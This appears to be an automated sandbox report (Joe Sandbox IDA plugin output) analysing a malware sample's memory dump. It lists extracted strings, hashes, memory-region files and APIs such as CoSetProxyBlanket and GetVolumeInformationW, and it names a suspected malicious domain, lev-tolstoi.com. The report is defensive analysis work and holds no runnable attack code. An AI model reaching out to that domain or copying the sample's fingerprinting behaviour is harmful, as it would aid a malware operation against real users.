%, xrefs: 00F13C4A
_, xrefs: 00F14633
d, xrefs: 00F134B9
e, xrefs: 00F13C8A
F, xrefs: 00F12F20
%, xrefs: 00F14031
D, xrefs: 00F14136
6, xrefs: 00F12BE4
7, xrefs: 00F13FC1
L, xrefs: 00F12A71
Y, xrefs: 00F1281E
l, xrefs: 00F12F48
<, xrefs: 00F134C9
G, xrefs: 00F13C02
_, xrefs: 00F135FC
K, xrefs: 00F14019
=, xrefs: 00F134D9
&, xrefs: 00F13C3A
", xrefs: 00F14059
Y, xrefs: 00F13C52
r, xrefs: 00F13D9A
#, xrefs: 00F14061
', xrefs: 00F14041
m, xrefs: 00F13F89
_, xrefs: 00F1472F
H, xrefs: 00F12F10
^, xrefs: 00F1463B
^, xrefs: 00F1435F
B, xrefs: 00F1393F
A, xrefs: 00F12F30
;, xrefs: 00F13967
], xrefs: 00F14367
\, xrefs: 00F141FF
^, xrefs: 00F1399F
;, xrefs: 00F13FA1
Z, xrefs: 00F1397F
E, xrefs: 00F12CB1
D, xrefs: 00F14578
{, xrefs: 00F13D62
/, xrefs: 00F14001
/, xrefs: 00F13C2A
F, xrefs: 00F1395F
^, xrefs: 00F14734
9, xrefs: 00F13977
l, xrefs: 00F13987
~, xrefs: 00F12D99
8, xrefs: 00F13937
@, xrefs: 00F1394F
\, xrefs: 00F1473E
f, xrefs: 00F127B6
_, xrefs: 00F139A7
<, xrefs: 00F12DA3
K, xrefs: 00F13BE2
d, xrefs: 00F12EF0
y, xrefs: 00F13D52
j, xrefs: 00F13413
^, xrefs: 00F13604
?, xrefs: 00F13076
3, xrefs: 00F13FE1
X, xrefs: 00F1398F
j, xrefs: 00F12F58
_, xrefs: 00F141E7
m, xrefs: 00F13CB2
0, xrefs: 00F13C1A
N, xrefs: 00F13FE9
c, xrefs: 00F13D22
*, xrefs: 00F12A6C
n, xrefs: 00F12F38
2, xrefs: 00F13403
2, xrefs: 00F12B1F
<, xrefs: 00F1336C
;, xrefs: 00F12F00
], xrefs: 00F141F7
:, xrefs: 00F13BDA
\, xrefs: 00F14481
], xrefs: 00F14643
A, xrefs: 00F13C12
], xrefs: 00F1360C
., xrefs: 00F13C5A
S, xrefs: 00F13FC9
k, xrefs: 00F12F60
], xrefs: 00F14479
S, xrefs: 00F13CA2
w, xrefs: 00F13D82
C, xrefs: 00F13C22
., xrefs: 00F13B82
1, xrefs: 00F13947
E, xrefs: 00F13BF2
3, xrefs: 00F13BEA
X, xrefs: 00F13D4A
^, xrefs: 00F141EF
V, xrefs: 00F13D7A
^, xrefs: 00F12D94
~, xrefs: 00F13433
a, xrefs: 00F1295D
}, xrefs: 00F13D32
g, xrefs: 00F13D02
`, xrefs: 00F13588
], xrefs: 00F14739
), xrefs: 00F14011
=, xrefs: 00F13F71
o, xrefs: 00F13997
v, xrefs: 00F13C7A
_, xrefs: 00F14469
[, xrefs: 00F13C62
|, xrefs: 00F13423
9, xrefs: 00F13F91
-, xrefs: 00F13FF1
i, xrefs: 00F13CD2
/, xrefs: 00F13C9A
U, xrefs: 00F13C72
Q, xrefs: 00F13C92
e, xrefs: 00F13CF2
+, xrefs: 00F14021
D, xrefs: 00F1456B
_, xrefs: 00F14357
i, xrefs: 00F13744
], xrefs: 00F13C32
/, xrefs: 00F13B87
5, xrefs: 00F13FB1
%, xrefs: 00F13957
?, xrefs: 00F13F81
O, xrefs: 00F13D5A
_, xrefs: 00F13C42
o, xrefs: 00F13CC2
\, xrefs: 00F139AF
W, xrefs: 00F13C82
D, xrefs: 00F1396F
L, xrefs: 00F1392F
9, xrefs: 00F13927
&, xrefs: 00F129D4
-, xrefs: 00F13B7D
J, xrefs: 00F13CDA
s, xrefs: 00F13DA2
y, xrefs: 00F134E9
k, xrefs: 00F13CE2
u, xrefs: 00F13D72
!, xrefs: 00F14051
\, xrefs: 00F1436F
=, xrefs: 00F13C0A
q, xrefs: 00F13D92
\, xrefs: 00F1464B
^, xrefs: 00F14471
R, xrefs: 00F13D8A

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
API String ID: 0-1985396431
Opcode ID: 703740c4bbc569cb20d51fc08acfd4f664bcdd28be9c6614114677c40ccb32da
Instruction ID: b064dcf524451737a72859ec0db0da5cebefafcd6c2512c6fe0ed2426b951c96
Opcode Fuzzy Hash: 703740c4bbc569cb20d51fc08acfd4f664bcdd28be9c6614114677c40ccb32da
Instruction Fuzzy Hash: B713B03250C7C08ED3259B3884443AFBFD16BD6324F198A6DE4D9873C2D6B98985EB53

Function 00F22E6D Relevance: 47.0, APIs: 2, Strings: 24, Instructions: 1505COMMON

Download Yara Rule

Strings

~SS}, xrefs: 00F22F37
- $f, xrefs: 00F23038
8]pY, xrefs: 00F22EFF
eN, xrefs: 00F241BA
V], xrefs: 00F231FA
rp, xrefs: 00F23FF3
+A#C, xrefs: 00F23D15
I, xrefs: 00F23048
Q*RG, xrefs: 00F22F5F
g}zh, xrefs: 00F22F27
JOSP, xrefs: 00F22F6F
CNF8, xrefs: 00F22F3F
wdnf, xrefs: 00F22F07
#E#G, xrefs: 00F23D1C
_^]\, xrefs: 00F22EA5
lev-tolstoi.com, xrefs: 00F233BD
R03!, xrefs: 00F22F77
9#', xrefs: 00F23040
=]=_, xrefs: 00F23D0E
].n^, xrefs: 00F22F57
Fm, xrefs: 00F231F2
%", xrefs: 00F2334A
_^]\, xrefs: 00F23695
s, xrefs: 00F22FCA

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: #E#G$%"$+A#C$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$s$wdnf$~SS}$rp
API String ID: 0-1313785595
Opcode ID: 89dcd2fdeaf1a19743455121f58f0f41b85b948584a8ed64d54fb649eb014cc2
Instruction ID: daa33afe584b3f1cf49d727b1d2b38e1beaff01fe4f1b33361d6e0321092f23b
Opcode Fuzzy Hash: 89dcd2fdeaf1a19743455121f58f0f41b85b948584a8ed64d54fb649eb014cc2
Instruction Fuzzy Hash: 0FB234B5A08311CFD714CF28D89176BBBE2FF96310F19856CE8859B391D7389902DB92

Function 00F158D5 Relevance: 29.6, APIs: 1, Strings: 15, Instructions: 1631COMMON

Download Yara Rule

Strings

uqrs, xrefs: 00F16AF0
3F&D, xrefs: 00F16273
L4, xrefs: 00F16780
~mfQ, xrefs: 00F1613E
pt}w, xrefs: 00F161F2
qRb`, xrefs: 00F16133
w}MI, xrefs: 00F16128
L4, xrefs: 00F16BA0
{zdy, xrefs: 00F1611D
*,-", xrefs: 00F166EF
ntxE, xrefs: 00F16112
_^]\, xrefs: 00F15B14
WQ, xrefs: 00F159E3
t~v:, xrefs: 00F161E7
S\], xrefs: 00F159EE

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
API String ID: 0-510280711
Opcode ID: 22a5fe7cf2ee57621464a58b68b592aafbae84fb2c5cdfc524ba37bf92db27c6
Instruction ID: 9448794618fd1c4af767b3c1d141781f230b23d12e7add3bdb2ed6edb93445db
Opcode Fuzzy Hash: 22a5fe7cf2ee57621464a58b68b592aafbae84fb2c5cdfc524ba37bf92db27c6
Instruction Fuzzy Hash: 37B228B6A083418FD7248F24D8917ABB7E2FFD6314F19852CE8C98B291D7359845EB43

Function 00F21D00 Relevance: 26.8, Strings: 21, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?, xrefs: 00F21F02
_, xrefs: 00F223B3
g, xrefs: 00F220CC
8, xrefs: 00F21F07
_, xrefs: 00F22141
,, xrefs: 00F221D9
\, xrefs: 00F21DB3
^, xrefs: 00F223B8
9, xrefs: 00F21F0C
], xrefs: 00F2214B
\, xrefs: 00F223C2
\, xrefs: 00F22150
], xrefs: 00F223BD
Z, xrefs: 00F220DB
], xrefs: 00F21DAE
^, xrefs: 00F22146
^, xrefs: 00F21DA9
_, xrefs: 00F21DA4
s, xrefs: 00F22284
!@, xrefs: 00F21D36
d, xrefs: 00F220D6

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
API String ID: 0-1565257739
Opcode ID: 67cf537bd22862907cb36e063d44cb6b008418873c36c8bb8fa3d6eb851fe49d
Instruction ID: 8c88646e66bb977fb97c2c9c6d78e9249b750e5ed026c6264dca22bd48d50e07
Opcode Fuzzy Hash: 67cf537bd22862907cb36e063d44cb6b008418873c36c8bb8fa3d6eb851fe49d
Instruction Fuzzy Hash: BE22CB7150C7A08FD364DF28D48136FBBE1AB96324F18492DE4D987392D3BA9845EB43

Function 00F39280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00001F7A), ref: 00F39550
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00F3958F
SysFreeString.OLEAUT32 ref: 00F398DF
SysFreeString.OLEAUT32(?), ref: 00F398E5
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 00F3992E

Strings

gd, xrefs: 00F3968E
SB, xrefs: 00F3979E
O^, xrefs: 00F397A6
b{tu, xrefs: 00F392D9, 00F3939B
:;$%, xrefs: 00F399C0
=hn, xrefs: 00F39676
Jtuj, xrefs: 00F392E5
t"j, xrefs: 00F3966E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
